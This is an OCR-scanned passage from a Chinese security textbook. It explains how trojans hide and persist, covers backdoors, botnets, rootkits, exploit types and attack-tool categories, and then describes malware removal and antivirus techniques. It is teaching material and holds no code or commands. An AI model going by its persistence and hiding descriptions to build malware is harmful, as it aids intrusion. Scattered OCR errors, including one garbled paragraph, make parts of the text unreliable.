时 的 隐蔽 性 功能 要 求 ， 木 马 会 采用 各 种 技术 手段 隐藏 本 身 运行 时 在 系统 中 的 痕迹 。 

木马 以 进程 形式 运行 时 被 系统 自 带 任务 管理 器 或 其 他 进程 查看 工具 所 记录 ， 因 此 一 
部 分 木马 会 通过 Rootkit 技术 拦截 系统 用 来 查询 进程 的 函数 ， 通 过 修改 返回 值 或 DKOM 
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技术 实现 自身 进程 的 隐藏 。 

与 进程 相 比 ， 通 过 线程 运行 一 般 从 用 户 角 度 是 查看 不 到 的 ， 所 以 现在 很 多 木马 为 了 
隐藏 自身 的 运行 , 把 其 主要 的 完成 恶意 操作 或 通信 的 功能 代码 放 在 DLL 中 , 植 入 后 在 目 
标 系统 中 生成 DLL 文件 ， 采 用 各 种 方法 将 其 DLL 注入 到 其 他 进程 中 执行 。 这 时 注入 的 
木马 DLL 是 以 线程 的 形式 运行 在 其 他 进程 中 。 而 还 有 一 些 木马 启动 后 , 通过 远程 线程 注 
入 技术 将 恶意 功能 代码 注入 到 其 他 进程 并 创建 远程 线程 ， 其 可 不 需要 相应 的 dl 文件。 

(2) 通信 形式 的 隐藏 

为 实现 木马 的 功能 ， 木 马 服 务 端 和 客户 端 之 间 必 须 进 行 通信 。 而 目前 很 多 木马 检测 
软件 正 是 通过 扫描 网 络 连接 和 端口 等 通用 特征 进行 木马 检测 的 ， 因 此 木马 也 采用 相应 的 
方法 对 其 通信 形式 进行 了 隐藏 和 变通 ， 使 其 很 难 被 端口 扫描 工具 发 现 。 

G) 存在 形式 的 隐藏 

木马 程序 本 身 在 操作 系统 中 以 可 执行 程序 (扩展 名 为 exe) 或 动态 链接 库 〈 扩 展 名 
dl) 文件 的 形式 存在 ， 因 此 对 于 这 些 文件 本 身 木 马 也 会 采用 各 种 手段 加 以 隐藏 。 木 马 会 
通过 修改 文件 属性 为 隐藏 ， 同 时 将 文件 改 为 系统 文件 属性 ， 使 其 难以 被 直接 发 现 ， 或 者 
直接 将 自身 存储 在 系统 某 些 特定 目录 中 实现 隐藏 。 另 外 , 也 可 以 直接 使 用 Rootkit 技术 挂 
钩 对 应 系统 函数 实现 文件 隐藏 。 

2.， 自 启动 功能 

木马 对 系统 的 第 一 次 感染 一 般 是 通过 网 页 挂 马 、 电 子 邮 件 、 利 用 漏洞 或 是 捆绑 文件 
等 欺骗 手段 诱骗 用 户 执 行 ， 而 木马 一 旦 感染 了 一 台 主 机 后 ， 则 会 想方设法 长 期 驻 留 于 系 
统 中 ， 因 此 木马 安装 后 ， 必 须 具备 自 启动 功能 。 

木马 自 加 载运 行 的 常见 方式 有 : 利用 注册 表 实 现 自 启动 、 与 其 他 文件 捆绑 在 一 起 启 
动 、 利 用 特定 的 系统 文件 或 其 他 特殊 方式 启动 。 

(1) 利用 注册 表 实 现 自 启动 

利用 注册 表 实 现 木 马 的 自 启动 是 最 常见 也 是 最 基础 的 方法 ， 但 利用 注册 表 实 现 自 启 
动 并 不 仅仅 意味 着 通过 修改 注册 表 启 动 项 来 实施 自 启动 ， 壁 如 利用 服务 启动 ， 其 最 终 也 
是 对 注册 表 进 行 了 相应 设置 。 根 据 木马 利用 注册 表 进 行 启 动 时 所 用 的 不 同 功能 ， 可 以 分 
为 三 类 : 利用 注册 表 启 动 项 启动 、 利 用 注册 表 文 件 关联 项 启动 、 利 用 注册 表 的 一 些 特殊 
功能 项 启动 。 

(2) 与 其 他 文件 捆绑 启动 

文件 捆绑 启动 就 是 把 木马 程序 或 启动 代码 捆绑 到 其 他 程序 中 ， 平 时 木马 程序 就 隐藏 
在 系统 或 这 些 程序 中 。 这 些 程序 一 旦 启动 ， 木 马 就 被 启动 。 例 如 ， 将 木马 捆绑 到 浏览 
上 ， 开 机 时 检测 不 到 木马 行为 ， 而 用 户 一 旦 打开 浏览 器 上 网 ， 木 马 就 会 被 附带 启动 。 

(3) 利用 特定 系统 文件 和 其 他 方式 启动 

在 Windows 系统 中 还 存在 其 他 一 些 文件 可 实现 自动 加 载 的 功能 , 通过 对 这 些 文件 的 
修改 ， 也 可 以 实现 木马 的 自动 加 载 。 例 如 Autostart 文件 、Winini 文件 、Wininitint 文件 、 
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System.ini 文件 、Winstart bat 文件 等 ， 在 此 就 不 再 做 具体 介绍 ， 读 者 可 以 自行 了 解 其 具 
体 的 实现 ， 当 然 ， 在 不 同 的 系统 上 ， 某 些 启动 特性 可 能 存在 较 大 差别 。 

关于 Windows 的 自 启动 程序 ， 大 家 可 以 进一步 利用 sysintemals 提供 的 Autoruns 工 
具 进 行 查看 。 

3. EEX BE 

ARG UR HE IEA EEA, BAF- SEEN A PRE, RS ARER 
THRE HE BE RE Te i i a BE BA PAT TR EY, AE ASS A A ER 
功能 ， 消 除 木 马 在 系统 中 的 所 有 痕迹 ， 结 束 其 功能 。 
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后 门 是 指 绕 过 系统 中 常规 安全 控制 机 制 而 获取 对 特定 软件 或 系统 的 访问 权限 的 程 
序 , 它 按照 攻击 者 自己 的 意图 提供 通道 。“ 后 门 ” 一 般 是 攻击 者 在 获得 目标 主机 控制 权 之 
后 为 了 今后 能 方便 地 进入 该 计算 机 而 安装 的 一 类 软件 , 它 不 仅 绕 过 系统 已 有 的 安全 设置 ， 
而 且 还 能 挫败 系统 上 各 种 增强 的 安全 设置 。 

而 广义 上 的 “后 门 ” 不 仅仅 指 这 一 类 软件 ， 也 可 以 是 软件 或 操作 系统 的 开发 者 故意 
留 下 的 一 串 特殊 操作 或 口令 ， 甚 至 可 能 是 一 个 故意 留 下 来 的 可 被 利用 的 漏洞 。 一 切 故 意 
为 之 的 可 以 使 攻击 者 绕 过 系统 认证 机 制 而 直接 进入 一 个 系统 的 方法 或 手段 都 可 以 称 之 为 
“后 门 ”。 

最 初 ， 后 门 程 序 通常 功能 比较 简单 ， 随 着 其 功能 的 日 益 丰 富 ， 其 和 木马 变 得 非常 相 
似 。 目 前 部 分 安全 公司 也 直接 将 其 与 远程 控制 型 木马 一 起 列 为 木马 下 的 BackDoor 子 类 。 


4.4.7 其 他 恶意 代码 


1. DDoS 程序 

分 布 式 拒绝 服务 (DDoS: Distributed Denial of Service) 攻击 指 借助 于 客户 /服务 器 
技术 ， 将 数量 众多 的 计算 机 联合 起 来 作为 攻击 平台 ， 对 一 个 或 多 个 目标 发 动 DoS 攻击 ， 
从 而 成 倍 地 提高 拒绝 服务 攻击 的 威力 。 它 是 一 种 分 布 、 协 作 的 大 规模 攻击 方式 ， 主 要 瞄 
准 比较 大 的 站 点 , 像 商 业 公 司 、 搜 索引 擎 和 政府 部 门 的 站 点 。 图 4-13 描述 了 传统 的 DDoS 
攻击 模式 。 

2. 僵尸 程序 (Bot) 

僵尸 (bot) 程序 是 robot 的 缩写 ， 是 指 实现 恶意 控制 功能 的 程序 代码 。 

僵尸 程序 和 命令 控制 服务 器 、 控 制 者 一 起 组 成 的 可 通信 、 可 控制 的 网 络 被 称 为 僵尸 
网 络 (BotNet)。 攻 击 者 通常 利用 僵尸 网 络 发 起 各 种 恶意 行为 ， 比 如 对 任何 指定 主机 发 起 
分 布 式 拒绝 服务 攻击 (DDoS)、 发 送 垃圾 邮件 (Spam)、 获 取 机 密 、 滥 用 资源 等 。 图 4-14 
描述 了 Botnet 的 基本 网 络 结构 。 
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图 4-13 ”传统 的 DDoS 攻击 模式 


僵尸 网 络 的 发 展 一般 经 历 传播 、 加 入 和 控制 三 个 阶段 ， 通 过 这 三 个 阶段 ， 僵 尸 程序 
会 根据 中 心服 务 器 的 控制 命令 下 载 、 更 新 僵尸 样本 。 正 因为 僵尸 网 络 能 随时 更 新 样本 ， 
使 得 僵尸 程序 能 够 保持 良好 的 健壮 性 。 

僵尸 网 络 中 心服 务 器 通过 命令 与 控制 通道 对 网 络 内 的 僵尸 主机 进行 控制 ， 僵 尸 程 序 
分 类 方法 比较 多 样 ， 但 是 一 般 以 命令 与 控制 机 制 采 取 的 协议 作为 分 类 标准 。 当 前 ， 僵 尸 
网 络 的 命令 与 控制 机 制 主要 有 3 种 : 基于 IRC 协议 的 命令 与 控制 机 制 、 基 于 HTTP 协议 
的 命令 与 控制 机 制 和 基于 P2P 协议 的 命令 与 控制 机 制 。 基 于 IRC 和 基于 HTTP 的 命令 与 
控制 机 制 是 C/S 模式 ， 存 在 一 个 集中 控制 服务 器 ， 并 通过 该 服务 器 向 网 络 内 的 各 僵尸 主 
机 发 送 命令 ; 基于 P2P 协议 的 命令 与 控制 机 制 采用 的 是 点 到 点 的 对 等 模式 ， 网 络 内 的 各 
僵尸 主机 均 可 以 作为 僵尸 网 络 的 中 心服 务 器 。 

僵尸 网 络 与 其 他 攻击 方式 最 大 的 区 别 特性 在 于 攻击 者 和 僵尸 主机 之 间 存 在 着 一 对 
多 的 控制 关系 ， 而 正 是 这 种 一 对 多 的 控制 关系 ， 使 得 攻击 者 能 够 以 极 低 的 代价 高 效 地 控 
制 大 量 的 资源 并 为 其 服务 ， 这 也 是 僵尸 网 络 攻击 模式 受到 黑客 青睐 的 根本 原因 。 

3. Rootkit 

Rootkit 是 20 世纪 90 年 代 出 现 的 一 种 计算 机 技术 。 它 最 初 被 定义 为 由 有 用 的 小 程序 
组 成 的 工具 包 ， 可 使 得 攻击 者 能 够 获得 计算 机 用 户 “root” 的 最 高 系统 权限 。 从 目前 的 
发 展 来 看 ，Rootkit 是 能 够 持久 或 可 靠 地 、 无 法 被 检测 地 存在 于 计算 机 上 的 一 组 程序 或 
代码 。 

目前 Rootkit 技术 的 关键 在 于 “使 得 目标 对 象 无 法 被 检测 ”， 因 此 Rootkit 所 采用 的 
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大 部 分 技术 和 技巧 都 用 于 在 计算 机 上 隐藏 代码 和 数据 。 正 因为 Rootkit 在 隐藏 上 有 如 此 优 
势 ， 近 些 年 很 多 恶意 软件 纷纷 利用 Rootkit 技术 达到 文件 隐藏 、 进 程 隐藏 、 注 册 表 隐藏 、 
端口 隐藏 的 目的 。 


Botnet 网 络 


Bot Bot 


图 4-14 Botnet 基本 网 络 结构 


Rootkits 主要 分 为 两 大 类 : 用 户 态 和 内 核 态 。 用 户 态 Rootkit 通常 是 进程 注入 式 
Rootkits， 而 内 核 态 则 多 为 驱动 级 Rootkits。 对 于 Windows 系统 来 说 ， 前 者 通常 通过 释放 
动态 链接 库 (DLL ) 文件 ， 并 将 它们 注入 到 其 他 软件 及 系统 进程 中 运行 ， 通 过 HOOK 方 
式 对 消息 进行 拦截 , 或 者 对 特定 函数 的 处 理 进行 修改 ， 以 阻止 Windows 及 应 用 程序 对 被 
保护 的 文件 进行 访问 。 后 者 技术 较为 复杂 ， 其 通过 加 载 Rootkits 驱动 程序 ， 获 取 对 
Windows 的 控制 权 。 当 程序 (Windows 及 杀毒 软件 等 ) 通过 系统 API 及 NTAPI 访问 文 
件 系 统 或 系统 资源 时 进行 监视 ， 一 旦 发 现 程序 访问 被 Rootkits 保护 的 文件 时 返回 一 个 进 
行 了 过 滤 处 理 的 结果 ， 从 而 达到 隐藏 文件 或 特定 对 象 的 目的 。 

4. Exploit 

Exploit〔 漏 洞 利 用 程序 是 针对 某 一 特定 漏洞 或 一 组 漏洞 而 精心 编写 的 漏洞 利用 程 
序 。 通 过 精心 构造 的 Exploit， 其 可 以 触发 目标 系统 的 特定 漏洞 ， 从 而 获得 目标 系统 的 控 
制 权 ， 或 者 形成 对 目标 程序 或 系统 的 拒绝 服务 。 

目前 比较 常见 的 Exploit 有 : 

(1) 主机 系统 漏洞 Exploit。 针 对 目标 主机 系统 ， 直 接 获 取 目 标 系统 的 控制 权 ， 如 
MS03026 (DCOMRPC 漏洞 ) 漏洞 利用 程序 ，MS04011 等 各 类 系统 漏洞 。 这 类 漏洞 利用 
程序 通常 可 以 给 攻击 者 提供 一 个 Shel ( 正 向 或 反 向 )、 增 加 一 个 高 权限 系统 账号 、 下 载 
执行 一 个 指定 的 恶意 程序 等 。 

(2) 文档 类 漏洞 Exploit。 其 通过 利用 数据 文档 编辑 或 阅读 软件 (如 MS Office, 
Adobe Acrobat Reader 等 ) 的 漏洞 ,将 恶意 代码 与 正常 文档 进行 捆绑 ， 生 成 一 个 恶意 的 文 
档 文件 。 当 目标 用 户 使 用 带 有 漏洞 的 文档 编辑 或 阅读 软件 打开 时 ， 则 会 触发 漏洞 ， 导 致 
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攻击 代码 获得 控制 权 ， 进 而 可 能 进一步 危害 到 系统 的 控制 权 。 目 前 比较 常见 的 被 利用 文 
档 类 型 包括 : PDF, WRI, DOC, XLS, PPT 等 。 这 类 Exploit 通常 可 以 用 来 释放 一 个 捆 
绑 在 文档 之 中 的 恶意 程序 ， 或 者 可 以 去 下 载 功能 更 强大 的 其 他 恶意 程序 。 

(3) 网 页 挂 马 类 Exploit。 其 主要 利用 当前 浏览 器 或 相关 系统 组 件 的 漏洞 ， 在 网 页 文 
件 中 嵌入 精心 设计 的 Exploit， 当 目标 用 户 利 用 带 有 漏洞 的 浏览 器 打开 这 类 挂 马 网 页 之 
Ji Exploit 被 触发 ， 将 导致 目标 浏览 器 自动 下 载 和 执行 指定 的 恶意 软件 。 

除 此 之 外 ， 由 于 漏洞 本 身 或 者 攻击 者 本 身 的 技术 原因 ， 部 分 Exploit 可 能 仅 造成 拒 
绝 服务 的 效果 , 或 者 虽然 无 法 获得 控制 权 , 但 可 以 改变 或 者 获取 目标 进程 中 的 部 分 数据 。 

5. 黑客 攻击 程序 

黑客 攻击 程序 由 于 可 能 对 网 络 或 计算 机 安全 造成 威胁 ， 因 此 也 经 常 被 各 大 杀毒 软件 
厂商 纳入 到 病毒 查 杀 范 围 之 列 。 

黑客 攻击 程序 大 致 可 以 分 为 如 下 几 类 : 

。 扫描 类 。 包括: 端口 扫描 程序 ， 漏 洞 扫描 程序 ， 局 域 网 主机 弱 口 令 扫描 程序 、Web 
扫描 程序 等 。 典 型 的 程序 有 : superscan、xscan、 流 光 、nmap 等 。 
密码 破解 类 。 如 md5s.exe，rainbowcrack，LOphtCrack， 万 能 钥匙 字典 ，HashCalc 等 。 
。 噢 探 监听 类 。 如 Cain. 
e 溢出 类 。 如 Metasploit. 
。 加 脱 过 软件。 如 UPX、ASProtect 等 。 
代理 软件 ， 如 socketsnake 等 。 
远程 控制 软件 。 如 冰河 、 灰 鸽子 等 。 

。 拥 绑 类 。 如 ExeBinder 等 。 

。 拒绝 服务 类 等 。 

6. 间谍 软件 

间谍 软件 是 一 种 能 够 在 用 户 不 知情 的 情况 下 ， 在 其 电脑 上 安装 后 门 、 收 集 用 户 信息 
的 软件 。 用 户 的 隐私 数据 和 重要 信息 会 被 “后 门 程序 ”捕获 ， 并 被 发 送 给 黑客 、 商 业 公 
司 等 。 

7. 广告 软件 

广告 软件 是 指 未 经 用 户 允 许 ， 下 载 并 安装 或 与 其 他 软件 捆绑 通过 弹出 式 广告 或 以 其 
他 形式 进行 商业 广告 宣传 的 程序 。 安 装 广告 软件 之 后 ， 往 往 造 成 系统 运行 缓慢 或 系统 异 
常 。 此 类 软件 往往 会 强制 安装 并 无 法 卸载 ; 在 后 台 收 集 用 户 信息 件 利 ， 和 危及 用 户 隐 私 ; 
频繁 弹出 广告 ， 消 耗 系统 资源 ， 使 其 运行 变 慢 等 。 


4.4.8 恶意 代码 的 清除 方法 
恶意 代码 的 清除 实质 上 是 恶意 代码 植 入 过 程 的 逆 过 程 ， 即 尽 可 能 地 将 恶意 代码 对 计 
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算 机 系统 产生 的 各 种 更 改 还 原 成 之 前 的 状态 ， 这 里 包括 对 系统 文件 的 修改 ， 对 注册 表 键 
及 键 值 增 加 、 删 除 或 修改 ， 以 及 对 各 类 文件 的 感染 或 者 增加 、 删 除 等 操作 。 

恶意 代码 在 植 入 到 计算 机 系统 的 过 程 中 ， 通 常会 对 主机 进行 如 下 修改 

。 添加 文件 到 系统 之 中 (包括 拷贝 恶意 代码 备份 ) 或 者 对 磁盘 的 扇 区 进行 修改 ; 

。 修改 主机 系统 中 的 文件 〈 包 括 感染 可 执行 文件 、 修 改 系统 配置 等 ); 

。 在 系统 中 写 入 启动 项 〈 包 括 注 册 表 键 值 、 系 统 配置 文件 、 服 务 、 启 动 目 录 等 )。 

恶意 代码 在 运行 的 过 程 中 ， 还 可 能 对 系统 产生 如 下 影响 : 

。 修改 系统 函数 功能 ; 

。 修改 系统 内 核 数据 结构 ; 

。 创建 恶意 进程 或 线程 ; 

。 启动 服务 ， 装 载 驱动 程序 ; 

。 对 本 系统 或 其 他 系统 进行 破坏 等 。 

在 进行 恶意 代码 清除 时 ， 如 果 恶 意 代 码 正在 运行 ， 则 还 需要 停止 恶意 代码 的 运行 进 
程 或 其 所 依附 的 其 他 进程 ， 务 载 驱 动 程序 或 者 停止 服务 ， 否 则 很 难 清除 干净 。 

恶意 代码 在 植 入 系统 时 ， 为 了 增加 清除 难度 ， 部 分 恶意 代码 通常 还 会 对 自身 的 各 种 
存在 痕迹 进行 隐藏 ， 或 者 在 系统 多 个 位 置 进行 文件 备份 ， 甚 至 采取 多 种 启动 方式 来 确保 
系统 重新 启动 之 后 获得 控制 权 。 因 此 ,为 了 彻底 清除 恶意 代码 ， 需 要 按照 如 下 步骤 进行 

O 停止 恶意 代码 的 所 有 活动 行为 〈 包 括 停止 进程 、 服 务 、 钊 载 DLL 等 )。 

@ 删除 恶意 代码 新 建 的 所 有 文件 备份 (包括 可 执行 文件 、 DLL 文件 、 驱动 程序 等 )。 

@ 清除 恶意 代码 写 入 的 所 有 启动 选项 。 

@ 对 被 计算 机 病毒 感染 的 文件 ， 还 需要 对 被 感染 文件 进行 病毒 清除 等 。 

在 进行 上 述 操 作 时 ， 大 多 数 情况 下 是 可 以 利用 系统 自 带 的 功能 或 工具 来 完成 的 ， 但 
有 时 候 还 需要 利用 其 他 功能 更 加 强大 的 工具 来 进行 ， 辟 如， 对 于 隐藏 的 进程 、 文 件 、 服 
务 、 注 册 表 键 值 等 ， 通 过 系统 自 带 的 功能 是 很 难 搜索 到 的 ， 这 就 需要 借助 于 外 部 工具 
壁 如 IceSword、DarkSpy、Xuetr 等 。 有 时 候 需 要 进入 到 系统 安全 模式 进行 操作 。 

需要 注意 的 是 ， 并 不 是 所 有 恶意 代码 对 系统 进行 的 修改 都 可 以 被 恢复 。 有 些 恶 意 代 
码 在 运行 时 ， 直 接 对 系统 的 某 些 文件 或 者 文件 的 部 分 内 容 进 行 了 非 备份 式 的 覆盖 操作 ， 
这 将 导致 系统 的 某 些 文件 和 数据 无 法 恢复 。 另 外 ， 如 果 恶 意 代 码 对 本 系统 外 的 其 他 目标 
产生 了 破坏 行为 ， 本 机 是 无 法 对 这 些 行 为 影响 进行 恢复 的 。 
4.4.9 ”典型 反 病 毒 技术 


目前 典型 的 反 病毒 技术 有 : 特征 码 技术 、 虚 拟 机 技术 、 启 发 扫描 技术 、 行 为 监控 技 
术 、 主 动 防御 技术 、 云 查 杀 技术 等 。 下 面 对 以 上 做 部 分 介绍 。 

1. 特征 值 查 毒 法 

特征 值 扫描 是 目前 国际 上 反 病 毒 公司 普遍 采用 的 查 毒 技术 。 其 前 提 是 需要 从 病毒 体 
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中 提取 病毒 特征 值 构成 病毒 特征 库 。 计 算 机 病毒 的 特征 值 〈 或 特征 串 ) 是 用 户 或 反 病 毒 
工作 者 鉴别 特定 计算 机 病毒 的 一 种 标志 。 目 前 绝 大 多 数 反 病 毒 软件 都 采用 了 特征 值 查 毒 
技术 。 采 用 该 技术 的 反 病毒 软件 不 可 缺少 的 两 个 部 分 是 反 病毒 引擎 和 病毒 特征 库 。 反 病 
毒 引 擎 用 来 对 疑似 病毒 样本 文件 进行 扫描 ， 其 需要 根据 病毒 特征 库 的 特征 条 目 来 确定 该 
疑似 病毒 样本 文件 是 否 包 含 了 特定 的 计算 机 病毒 。 

但 是 传统 的 特征 值 查 毒 技术 只 能 检测 已 知 的 计算 机 病毒 。 面 对 不 断 出 现 的 新 病毒 ， 
必须 不 断 更 新 版 本 ， 否 则 检测 软件 便 会 逐渐 失去 实用 价值 。 另 外 ， 由 于 多 态 、 变 形 病毒 
的 不 断 出 现 ， 这 些 病毒 每 传染 一 次 就 变换 自己 的 代码 ， 传 统 的 特征 串 根本 无 法 抽取 ， 即 
使 抽取 出 来 也 无 法 针对 各 种 病毒 样本 有 效 。 因 此 ， 传 统 的 特征 值 查 毒 技术 在 面临 变形 病 
毒 时 往往 效果 不 佳 ， 特 别 是 目前 某 些 病毒 作者 针对 性 地 根据 反 病 毒 软件 最 新 特征 库 进行 
免 查 杀 处 理 ， 使 得 目前 的 反 病毒 软件 很 难 及 时 检测 出 这 类 病毒 ， 反 病毒 软件 在 与 计算 机 
病毒 作者 的 对 抗 中 地 位 显得 比较 尴 粹 。 

特征 值 检测 方法 的 优点 是 : 检测 准确 、 可 识别 病毒 的 名 称 、 误 报 率 低 ， 并 且 依 据 检 
测 结 果 可 做 解毒 处 理 。 

其 缺点 是 : 

O 开销 大 、 查 杀 速 度 慢 。 搜 集 已 知 病毒 特征 串 的 费用 开销 大 。 随 着 病毒 种 类 的 增 
多 ， 获 得 分 析 样 本 的 时 间 变 长 。 另 外 ， 样 本 数 急剧 增加 ， 目 前 各 大 反 病 毒 公 司 的 样本 库 
记录 都 在 几 十 万 条 以 上 ， 虽 然 样本 数量 和 查 杀 速度 不 是 线性 关系 ， 但 进行 病毒 扫描 的 时 
间 开 销 无 疑 将 会 逐渐 增 大 。 

© 不 能 检查 未 知 病毒 和 多 态 性 病毒 。 特 征 值 检测 方法 是 不 可 能 检测 多 态 性 病毒 的 ， 
因为 其 代码 不 唯一 。 虽 然 目 前 有 些 反 病毒 厂商 在 提取 特征 码 时 提出 了 一 些 可 以 提取 多 态 
性 病毒 共同 特征 码 的 方法 ， 但 效果 有 限 。 

@ 容易 被 针对 性 免 杀 。 

2. 校 验 和 技术 

计算 正常 文件 的 内 容 和 正常 的 系统 扇 区 的 校 验 和 ， 将 该 校 验 和 写 入 数据 库 中 保存 。 
在 文件 使 用 /系统 启动 过 程 中 ， 检 查 文件 现在 内 容 的 校 验 和 与 原来 保存 的 校 验 和 是 否 一 
致 ， 因 而 可 以 发 现 文件 /引导 区 是 否 感染 ， 这 种 方法 叫 校 验 和 检测 技术 。 

运用 校 验 和 检测 技术 查 病毒 采用 3 种 方式 : 

© 在 检测 病毒 工具 中 纳入 校 验 和 检测 技术 ， 对 被 查 的 对 象 文件 计算 其 正常 状态 的 
校 验 和 ， 将 校 验 和 值 写 入 被 查 文件 中 或 检测 工具 中 ， 而 后 进行 比较 。 

@ 在 应 用 程序 中 ， 放 入 校 验 和 检测 技术 自我 检查 功能 ， 将 文件 正常 状态 的 校 验 和 
写 入 文件 本 身 中 ， 每 当 应 用 程序 启动 时 ， 比 较 现 行 校 验 和 与 原 校 验 和 值 。 实 现 应 用 程序 
的 自 检测 。 

© 将 校 验 和 检查 程序 常 驻 内 存 ， 每 当 应 用 程序 开始 运行 时 ， 自 动 比较 检查 应 用 程 
序 内 部 或 别 的 文件 中 预先 保存 的 校 验 和 。 
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校 验 和 检测 方法 ， 也 称 之 为 比较 检测 法 。 比 较 的 对 象 可 分 为 系统 数据 、 文 件 的 头 部 、 
文件 的 属性 和 文件 的 内 容 。 

在 计算 校 验 和 时 ， 可 以 采用 CRC 校 验算 法 , 或 者 采用 散 列 算法 。 散 列 算法 是 对 整个 
文件 计算 文件 摘要 ,常用 算法 为 MD5 (Message Digest) 或 SHA (Standard Hash Algorithm). 

校 验 和 检测 技术 的 优点 是 : 方法 简单 、 能 发 现 未 知 病毒 、 被 查 文件 的 细微 变化 也 能 
发 现 。 其 缺点 是 : 必须 预先 记录 正常 文件 的 校 验 和 、 会 误 报警 、 不 能 识别 病毒 名 称 、 不 
对 付 隐 蔽 型 病毒 和 效率 低 。 

3. 启发 式 扫描 技术 

病毒 和 正常 程序 的 区 别 可 以 体现 在 许多 方面 ， 一 个 熟练 的 程序 员 在 调试 状态 下 只 需 
一 向 便 可 一 日 了 然 。 启 发 式 代 码 扫描 技术 (Heuristic Scanning) 实际 上 就 是 把 这 种 经 验 
和 知识 移植 到 反 病 毒 软件 中 。 

启发 性 扫描 主要 是 分 析 文 件 中 的 指令 序列 ， 根 据 统计 知识 ， 判 断 该 文件 被 感染 的 可 
能 性 ， 从 而 有 可 能 找到 未 知 的 病毒 。 因 此 ， 启 发 性 扫描 技术 是 一 种 概率 方法 ， 遵 循 概率 
理论 的 规律 。 早 期 的 启发 式 扫 描 软件 采用 代码 反 编译 技术 作为 它 的 实现 基础 。 这 类 病毒 
检测 软件 在 内 部 保存 数 万 种 病毒 行为 代码 的 跳 转 表 ， 每 个 表 项 存储 一 类 病毒 行为 的 必用 
代码 序列 ， 比 如 病毒 格式 化 磁盘 必用 到 的 代码 。 启 发 式 病毒 扫描 软件 反 编译 出 被 检测 文 
件 的 代码 ， 然 后 在 这 些 表 格 的 支持 (启发 ) 下 ， 使 用 “静态 代码 分 析 法 ”和 “代码 相似 
比较 法 ”等 有 效 手 段 , 就 能 有 效 地 查 出 已 知 病毒 的 变种 以 及 判定 文件 是 否 含有 未 知 病毒 。 

除了 对 可 疑 样 本 进行 静态 代码 扫描 之 外 ， 也 可 以 在 虚拟 或 真实 环境 中 监测 执行 可 疑 
样本 行为 ， 进 行动 态 启 发 式 检测 。 

正如 任何 其 他 的 通用 检测 技术 一 样 ， 启 发 式 扫 描 技术 有 时 也 会 把 一 个 本 无 病毒 的 程 
序 认为 是 染 毒 程序 ， 产 生 误 报 。 原 因 很 简单 ， 被 检测 程序 中 可 能 含有 病毒 常 使 用 的 可 疑 
功能 或 代码 。 

启发 式 扫描 技术 仍然 是 一 种 正在 发 展 和 不 断 完善 的 技术 ， 但 已 经 在 大 量 优秀 的 反 病 
毒 软件 中 得 到 迅速 的 推广 和 应 用 。 

从 实际 应 用 的 效果 看 来 ， 传 统 的 扫描 技术 〈 特 征 值 检 测 技术 ) 是 基于 对 已 知 病毒 的 
分 析 和 研究 ， 在 检测 时 能 够 更 准确 。 但 其 对 未 知 病毒 容易 形成 漏 报 。 而 启发 式 扫描 技术 
则 正好 弥补 此 不 足 。 传 统 扫描 技术 与 启发 式 扫描 技术 的 结合 可 以 使 病毒 检测 软件 的 检 出 
率 得 到 显著 提升 。 

当然 启发 式 扫描 技术 的 出 现 ， 也 激发 和 促使 病毒 制作 者 不 断 研制 了 不 少 新 技术 来 绕 
过 这 种 检测 方法 。 

4. 虚拟 机 技术 

多 态 性 病毒 每 次 感染 都 改变 自身 ， 对 付 这 种 病毒 ， 普 通 特征 值 检测 方法 失效 。 

一 般 而 言 ， 多 态 性 病毒 采用 以 下 几 种 操作 来 不 断 变换 自己 : 采用 等 价 代 码 对 原 有 代 
码 进行 蔡 换 ， 改 变 与 执行 次 序 无 关 的 指令 的 次 序 ; 增加 许多 垃圾 指令 ;对 原 有 病毒 代码 
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进行 压缩 或 加 密 。 但 是 ， 无 论 病毒 如 何 变化 、 每 一 个 多 态 病毒 在 其 自身 执行 时 都 要 对 自 
身 进行 还 原 。 

为 了 检测 多 态 性 病毒 ， 反 病毒 专家 研制 了 一 种 新 的 检测 方法 一 一 “虚拟 机 技术 ”。 
该 技术 也 称 为 软件 模拟 法 , 它 是 一 种 软件 分 析 器 , 用 软件 方法 来 模拟 和 分 析 程序 的 运行 ， 
而 且 程 序 的 运行 不 会 对 系统 起 实际 的 作用 ( 仅 是 “模拟 ”)， 因 而 不 会 对 系统 造成 危害 。 
其 实质 都 是 让 病毒 在 虚拟 的 环境 执行 ， 从 而 让 其 原形 毕露 。 

虚拟 机 实际 是 用 软件 的 方法 模拟 地 解释 执行 所 有 的 或 者 设计 者 关心 的 CPU TRS, E 
意 营 造 一 个 假 的 、 可 观察 的 、 可 控制 的 目标 程序 运行 环境 。 反 病毒 软件 通过 构造 计算 机 
的 寄存 器 表 、 指 令 对 照 表 和 虚拟 内 存 ， 能 够 让 病毒 体 在 虚拟 机 中 运行 一 段 时 间 。 编 码 病 
毒 在 运行 过 程 中 完成 自 解码 ， 还 原 成 病毒 体 “ 原形”。 病 毒 在 自 解码 之 后 ， 还 要 再 度 结合 
原来 的 特征 值 方法 ， 将 已 知 病毒 代码 特征 库 的 先 验 知识 应 用 到 虚拟 机 的 运行 结果 中 ， 完 
成 对 一 个 特定 已 知 病毒 的 判定 。 

尽管 具体 实现 上 困难 重重 ， 虚 拟 机 仍然 在 反 病 毒 软件 中 获得 了 极其 成 功 的 应 用 ， 目 
前 大 多 数 反 病毒 软件 都 采用 了 虚拟 机 技术 。 

虚拟 机 技术 具有 如 下 优点 : 

@ 由 于 代码 与 数据 的 天 然 区 别 ， 代 码 可 执行 而 数据 不 可 执行 ， 杜 绝 了 原来 传统 特 
征 值 监测 技术 常常 把 数据 误 当 成 病毒 报警 的 情形 ， 误 报 率 降低 。 

@ 由 于 代码 是 虚拟 运行 ， 病 毒 被 装 在 虚拟 环境 里 执行 ， 真 正 的 CPU 从 来 没有 真正 
运行 病毒 代码 。 因 此 ， 病 毒 可 能 实施 的 破坏 在 虚拟 机 监控 下 ， 不 会 真正 发 生 。 

© 在 虚拟 机 中 ， 虽 然 它 会 运行 这 些 病 毒 代 码 ， 但 却 不 会 造成 虚拟 机 的 死机 。 例 如 
一 条 INT 3H 指令 可 以 令 真 的 CPU 停机 ， 但 虚拟 机 则 可 将 之 识别 ， 不 会 真 停机 。 

@ 各 种 病毒 生产 机 或 辅助 开发 包 生 成 的 病毒 ， 由 于 产生 的 是 同族 病毒 ， 大 同 小 异 ， 
在 内 存 中 运行 还 原 后 面貌 大 致 相同 ， 不 同 的 只 是 在 硬盘 上 储存 时 的 静态 排列 方式 ， 借 此 
逃避 特征 值 监测 技术 的 扫描 。 而 虚拟 机 可 以 在 还 原 其 真实 面目 的 基础 上 ， 再 进一步 用 特 
